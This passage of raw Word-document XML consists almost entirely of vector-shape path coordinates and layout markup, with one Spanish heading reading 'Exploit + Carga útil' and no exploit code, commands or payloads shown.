                                <a:lnTo>
                                  <a:pt x="354344" y="164360"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="342536" y="175842"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="342536" y="193265"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="342123" y="193925"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="626745" h="762635">
                                <a:moveTo>
                                  <a:pt x="341582" y="194451"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="342123" y="193925"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="342536" y="193265"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="341582" y="194451"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="626745" h="762635">
                                <a:moveTo>
                                  <a:pt x="341582" y="176770"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="341582" y="194451"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="342536" y="193265"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="342536" y="175842"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="341582" y="176770"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="626745" h="762635">
                                <a:moveTo>
                                  <a:pt x="328451" y="191883"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="328451" y="215788"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="328778" y="215265"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="328984" y="214737"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="328984" y="214936"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="342123" y="193925"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="341582" y="194451"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="341582" y="176770"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="332192" y="185900"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="328984" y="191030"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="328984" y="214737"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="328778" y="215143"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="328778" y="191359"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="328451" y="191883"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="626745" h="762635">
                                <a:moveTo>
                                  <a:pt x="319970" y="237824"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="328778" y="215265"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="328451" y="215788"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="328451" y="191883"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="320248" y="205002"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="320248" y="236893"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="319970" y="237824"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="626745" h="762635">
                                <a:moveTo>
                                  <a:pt x="307981" y="233672"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="307981" y="530996"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="314276" y="530996"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="314276" y="269624"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="315883" y="256235"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="315883" y="256522"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="320248" y="236893"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="320248" y="237112"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="319970" y="237824"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="319970" y="205447"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="317386" y="209579"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="307981" y="233672"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="626745" h="762635">
                                <a:moveTo>
                                  <a:pt x="319970" y="205447"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="319970" y="237824"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="320248" y="236893"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="320248" y="205002"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="319970" y="205447"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="626745" h="762635">
                                <a:moveTo>
                                  <a:pt x="307981" y="530996"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="314276" y="537407"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="314276" y="530996"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="307981" y="530996"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="626745" h="762635">
                                <a:moveTo>
                                  <a:pt x="217184" y="749076"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="226146" y="749076"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="221665" y="744597"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="217184" y="749076"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="626745" h="762635">
                                <a:moveTo>
                                  <a:pt x="221665" y="744597"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="226146" y="749076"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="226146" y="740178"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="225139" y="741125"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="221665" y="744597"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="626745" h="762635">
                                <a:moveTo>
                                  <a:pt x="217184" y="740119"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="217184" y="749076"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="221665" y="744597"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="217184" y="740119"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="626745" h="762635">
                                <a:moveTo>
                                  <a:pt x="193176" y="108174"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="193176" y="131423"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="193459" y="130988"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="193672" y="130500"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="193672" y="130661"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="214854" y="98091"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="214487" y="98487"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="214487" y="79828"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="204812" y="90281"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="193672" y="107412"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="193672" y="130500"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="193459" y="130896"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="193459" y="107739"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="193176" y="108174"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="626745" h="762635">
                                <a:moveTo>
                                  <a:pt x="14332" y="530996"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="14332" y="543669"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="19020" y="533060"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="28712" y="543669"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="155887" y="543669"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="155887" y="274695"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="156435" y="268681"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="157562" y="252284"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="157562" y="252469"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="161446" y="228109"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="168131" y="198130"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="178460" y="165530"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="178693" y="164877"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="193459" y="130988"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="193176" y="131423"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="193176" y="108174"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="182261" y="124959"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="166704" y="160651"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="155887" y="194808"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="149547" y="223219"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="149547" y="530996"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="143207" y="537332"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="143207" y="530996"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="14332" y="530996"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="626745" h="762635">
                                <a:moveTo>
                                  <a:pt x="143207" y="530996"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="143207" y="537332"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="149547" y="530996"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="143207" y="530996"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="626745" h="762635">
                                <a:moveTo>
                                  <a:pt x="143207" y="274086"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="143207" y="530996"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="149547" y="530996"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="149547" y="223219"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="148953" y="225886"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="144935" y="251128"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="143800" y="267525"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="143207" y="274086"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="626745" h="762635">
                                <a:moveTo>
                                  <a:pt x="14332" y="543669"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="28712" y="543669"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="19020" y="533060"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="14332" y="543669"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:solidFill>
                            <a:srgbClr val="EC7C30"/>
                          </a:solidFill>
                        </wps:spPr>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:prstTxWarp prst="textNoShape">
                            <a:avLst/>
                          </a:prstTxWarp>
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group w14:anchorId="3D2B5391" id="Group 89" o:spid="_x0000_s1026" style="position:absolute;margin-left:822.1pt;margin-top:-18.35pt;width:49.35pt;height:60.05pt;z-index:15744512;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page" coordsize="6267,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">
                <v:shape id="Graphic 90" o:spid="_x0000_s1027" style="position:absolute;left:139;top:69;width:6071;height:7474;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="60706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" path="m,530788r82063,88892l207329,747013,432686,530788r-138820,l293866,268616r1859,-72398l308739,159040r35325,-13697l412855,143386r75142,33785l525872,251498r13366,74328l540858,359611r27043,351364l591310,564137r11747,-98779l606690,369788r-929,-137209l601041,187605,588475,145974,568976,108303,543459,75208,512838,47308,478027,25220,439942,9561,399495,948,357602,,315176,7332,273133,23562,223554,56896r-49931,64488l147271,190347r-10296,54943l135214,267715r,263073l,530788xe" fillcolor="#171717" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 91" o:spid="_x0000_s1028" style="position:absolute;width:6267;height:7626;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="626745,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" path="m584220,660656r4339,56375l588559,718237r495,-2490l590211,707130r2239,-12885l594726,676076r6761,-48440l615594,492278r6212,-80686l625758,326341r570,-87083l624022,207057r-6362,-30662l613663,164885r,71069l613085,325883r-3929,84701l602974,491039,592277,596854r-6731,54972l584220,660656xem583300,105990r,20824l583567,127358r372,492l583939,128118r11711,23918l595965,152573r128,369l596258,153279r,138l605543,180164r,261l611522,209219r,736l613663,239911r,-75026l607819,148053r-2276,-4649l605543,180164r-135,-488l605408,143129r-9150,-18690l596258,153279r-165,-398l596093,124102r-1668,-3407l583939,106834r,21016l583567,127246r,-20904l583300,105990xem576021,716273r,1740l588559,718772r,-1741l577659,716372r-1638,-99xem576021,716273r12538,758l584220,660656r-2069,13768l579935,692157r-2276,13139l576585,713356r-564,2917xem519648,220968r14382,39252l534030,260439r8788,38431l542818,299142r4395,34106l548312,346984r554,9951l548866,366590r27155,352783l576021,716273r564,-2917l577659,705296r2276,-13139l582151,674424r2069,-13768l561531,365862r,-9453l560952,346019r-1142,-14310l555243,296347r-9172,-40107l534030,223368r,36852l533896,259765r,-36762l531025,215165,520072,198882r,22717l519648,220968xem549453,82265r34114,45093l583300,126814r,-20824l558669,73433r-8624,-7076l550045,82750r-592,-485xem549008,81677r445,588l550045,82750r-1037,-1073xem549008,65506r,16171l550045,82750r,-16393l549008,65506xem506711,47199r42742,35066l549008,81677r,-16171l513552,36412r-6160,-2938l507392,47524r-278,-178l506711,47199xem519381,220241r267,727l520072,221599r-691,-1358xem519381,197854r,22387l520072,221599r,-22717l519381,197854xem496973,169870r,17381l497350,187812r487,468l497837,188536r21811,32432l519381,220241r,-22387l507114,179616r-9277,-8916l497837,188280r-487,-580l497350,170232r-377,-362xem506100,32858r,13840l506711,47088r403,303l507392,47524r,-14050l506100,32858xem214487,79828r,18659l214854,98091r294,-453l215148,97773,234785,76578r7136,-7815l264877,50677,287451,37402r2644,-1590l317386,24046r465,-322l344406,17123r2066,-531l373913,12792r30168,7l426684,15992r3501,450l451759,22133r4928,1216l457082,23537r709,187l457791,23875r48920,23324l506100,46698r,-13840l461615,11637r-3824,-1016l457791,23724r-709,-241l457082,10432,433069,4054,404081,,373913,,314276,11561,258087,39941,215148,79114r,18524l214854,98016r,-18584l214487,79828xem483189,159513r,14690l483700,174694r571,350l484271,175242r13079,12570l496973,187251r,-17381l491482,164593r-7211,-4417l484271,175044r-571,-444l483700,159827r-511,-314xem466805,151107r,13238l467373,164693r694,238l468067,165118r15633,9576l483189,174203r,-14690l472837,153173r-4770,-1634l468067,164931r-694,-323l467373,151301r-568,-194xem448349,145618r,12556l449064,158419r719,70l449783,158665r17590,6028l466805,164345r,-13238l451759,145951r-1976,-193l449783,158489r-719,-158l449064,145688r-715,-70xem,530996r59832,65828l113993,653778r44005,45107l221665,762513r12368,-12353l243491,741262,363471,626412r37237,-34956l431109,561627r11891,-11314l462328,530996r-15309,l447019,543669r-15425,l422335,552483r-30356,29783l354773,617192,234785,732047r-8639,8131l226146,749076r-8962,l217184,740119,167042,690003,123165,645024,69184,588265,28712,543669r-14380,l14332,530996,,530996xem426684,143616r,12621l428202,156199r,186l448349,158349r715,70l448349,158174r,-12556l428202,143650r,12549l427430,156218r,-12643l426684,143616xem431594,543669r15425,l442542,532850r-8346,8341l431594,543669xem301521,269492r,274177l431594,543669r2602,-2478l442542,532850r4477,10819l447019,530996r-132743,l314276,537407r-6295,-6291l307981,233672r-4688,21052l301521,269492xem388764,149035r,12795l390567,161289r,284l426684,156416r473,-68l426684,156237r,-12621l390567,148778r,12511l389705,161696r,-12795l388764,149035xem388764,161830r941,-134l390567,161289r-1803,541xem361678,174909r28027,-13213l388764,161830r,-12795l386022,149427r-23595,11123l362427,174180r-749,729xem360707,175366r971,-457l362427,174180r-1720,1186xem360707,161361r,14005l362427,174180r,-13630l360707,161361xem342123,193925r19555,-19016l360707,175366r,-14005l354344,164360r-11808,11482l342536,193265r-413,660xem341582,194451r541,-526l342536,193265r-954,1186xem341582,176770r,17681l342536,193265r,-17423l341582,176770xem328451,191883r,23905l328778,215265r206,-528l328984,214936r13139,-21011l341582,194451r,-17681l332192,185900r-3208,5130l328984,214737r-206,406l328778,191359r-327,524xem319970,237824r8808,-22559l328451,215788r,-23905l320248,205002r,31891l319970,237824xem307981,233672r,297324l314276,530996r,-261372l315883,256235r,287l320248,236893r,219l319970,237824r,-32377l317386,209579r-9405,24093xem319970,205447r,32377l320248,236893r,-31891l319970,205447xem307981,530996r6295,6411l314276,530996r-6295,xem217184,749076r8962,l221665,744597r-4481,4479xem221665,744597r4481,4479l226146,740178r-1007,947l221665,744597xem217184,740119r,8957l221665,744597r-4481,-4478xem193176,108174r,23249l193459,130988r213,-488l193672,130661,214854,98091r-367,396l214487,79828r-9675,10453l193672,107412r,23088l193459,130896r,-23157l193176,108174xem14332,530996r,12673l19020,533060r9692,10609l155887,543669r,-268974l156435,268681r1127,-16397l157562,252469r3884,-24360l168131,198130r10329,-32600l178693,164877r14766,-33889l193176,131423r,-23249l182261,124959r-15557,35692l155887,194808r-6340,28411l149547,530996r-6340,6336l143207,530996r-128875,xem143207,530996r,6336l149547,530996r-6340,xem143207,274086r,256910l149547,530996r,-307777l148953,225886r-4018,25242l143800,267525r-593,6561xem14332,543669r14380,l19020,533060r-4688,10609xe" fillcolor="#ec7c30" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <w10:wrap anchorx="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Exploit + Carga útil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2747389B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="487601152" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4CF1B634" wp14:editId="6FE7CC9E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>3399282</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>127191</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6332855" cy="28638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286385"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst/>
                          <a:ahLst/>
                          <a:cxnLst/>
                          <a:rect l="l" t="t" r="r" b="b"/>
                          <a:pathLst>
                            <a:path w="6332855" h="286385">
                              <a:moveTo>
                                <a:pt x="6256527" y="210185"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="6256522" y="211836"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="6256400" y="248412"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="6256273" y="286385"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="6313710" y="257810"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="6269100" y="257810"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="6269100" y="238760"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="6313393" y="238760"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="6256527" y="210185"/>
                              </a:lnTo>
                              <a:close/>
                            </a:path>
                            <a:path w="6332855" h="286385">
                              <a:moveTo>
                                <a:pt x="3341767" y="132334"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="3374643" y="152146"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3415918" y="160654"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3496944" y="171703"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3576192" y="179704"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3637534" y="184912"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3743102" y="192786"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3900423" y="202437"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="4282186" y="220599"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="5107559" y="245110"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="6269100" y="257810"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="6256369" y="257810"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="6256432" y="238760"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="6269100" y="238760"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="5107940" y="226060"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="4282947" y="201549"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3901566" y="183514"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3671950" y="168528"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3577970" y="160782"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3523615" y="155448"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3455538" y="147351"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3455770" y="147351"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3436366" y="144652"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3419220" y="141859"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3404245" y="139136"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3403839" y="139136"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3400966" y="138540"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3400241" y="138408"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3390927" y="136459"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3390631" y="136459"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3380398" y="133986"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3380265" y="133986"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3379538" y="133730"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3343528" y="133730"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3341767" y="132334"/>
                              </a:lnTo>
                              <a:close/>
                            </a:path>
                            <a:path w="6332855" h="286385">
                              <a:moveTo>
                                <a:pt x="6313393" y="238760"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="6269100" y="238760"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="6269100" y="257810"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="6313710" y="257810"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="6332600" y="248412"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="6313393" y="238760"/>
                              </a:lnTo>
                              <a:close/>
                            </a:path>
                            <a:path w="6332855" h="286385">
                              <a:moveTo>
                                <a:pt x="3455770" y="147351"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="3455538" y="147351"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3458099" y="147675"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3455770" y="147351"/>
                              </a:lnTo>
                              <a:close/>
                            </a:path>
                            <a:path w="6332855" h="286385">
                              <a:moveTo>
                                <a:pt x="3400966" y="138540"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="3403839" y="139136"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3404245" y="139136"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3400966" y="138540"/>
                              </a:lnTo>
                              <a:close/>
                            </a:path>
                            <a:path w="6332855" h="286385">
                              <a:moveTo>
                                <a:pt x="3389039" y="136065"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="3390631" y="136459"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3390927" y="136459"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3389039" y="136065"/>
                              </a:lnTo>
                              <a:close/>
                            </a:path>
                            <a:path w="6332855" h="286385">
                              <a:moveTo>
                                <a:pt x="3379563" y="133730"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="3380265" y="133986"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3380395" y="133986"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3379563" y="133730"/>
                              </a:lnTo>
                              <a:close/>
                            </a:path>
                            <a:path w="6332855" h="286385">
                              <a:moveTo>
                                <a:pt x="3340735" y="130048"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="3341461" y="131823"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3341750" y="131952"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3341514" y="131952"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3341767" y="132334"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3343528" y="133730"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3342180" y="131952"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3341750" y="131952"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3341535" y="131823"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3342082" y="131823"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3340735" y="130048"/>
                              </a:lnTo>
                              <a:close/>
                            </a:path>
                            <a:path w="6332855" h="286385">
                              <a:moveTo>
                                <a:pt x="3368022" y="130048"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="3340735" y="130048"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3343528" y="133730"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3379566" y="133730"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3370502" y="130952"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3368022" y="130048"/>
                              </a:lnTo>
                              <a:close/>
                            </a:path>
                            <a:path w="6332855" h="286385">
                              <a:moveTo>
                                <a:pt x="3340688" y="131478"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="3341767" y="132334"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3341514" y="131952"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3341461" y="131823"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3340688" y="131478"/>
                              </a:lnTo>
                              <a:close/>
                            </a:path>
                            <a:path w="6332855" h="286385">
                              <a:moveTo>
                                <a:pt x="3340082" y="130952"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="3340258" y="131136"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3340688" y="131478"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3341461" y="131823"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3340959" y="131478"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3340082" y="130952"/>
                              </a:lnTo>
                              <a:close/>
                            </a:path>
                            <a:path w="6332855" h="286385">
                              <a:moveTo>
                                <a:pt x="3341104" y="130952"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="3340082" y="130952"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3341535" y="131823"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3341320" y="131478"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3341180" y="131136"/>
